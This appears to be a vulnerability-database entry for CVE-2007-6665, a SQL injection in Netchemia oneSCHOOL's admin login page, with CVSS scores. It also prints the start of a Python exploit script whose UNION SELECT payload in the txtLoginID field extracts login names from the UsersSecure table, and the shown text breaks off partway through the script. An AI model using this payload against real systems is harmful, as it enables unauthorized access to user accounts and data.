7.5
CVSSv2

CVE-2007-6665

Published: 04/01/2008 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in admin/login.asp in Netchemia oneSCHOOL allows remote malicious users to execute arbitrary SQL commands via the txtLoginID parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

netchemia oneschool

Exploits

#!/usr/bin/python #oneSCHOOL admin/loginasp SQL Injection explot (for all versions) #by Guga360 import urllib from sys import argv query = {'txtOperation':'Login','txtLoginID':""" ' union select min(LoginName),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName>'a'--""",'txtPassword':'x','btn ...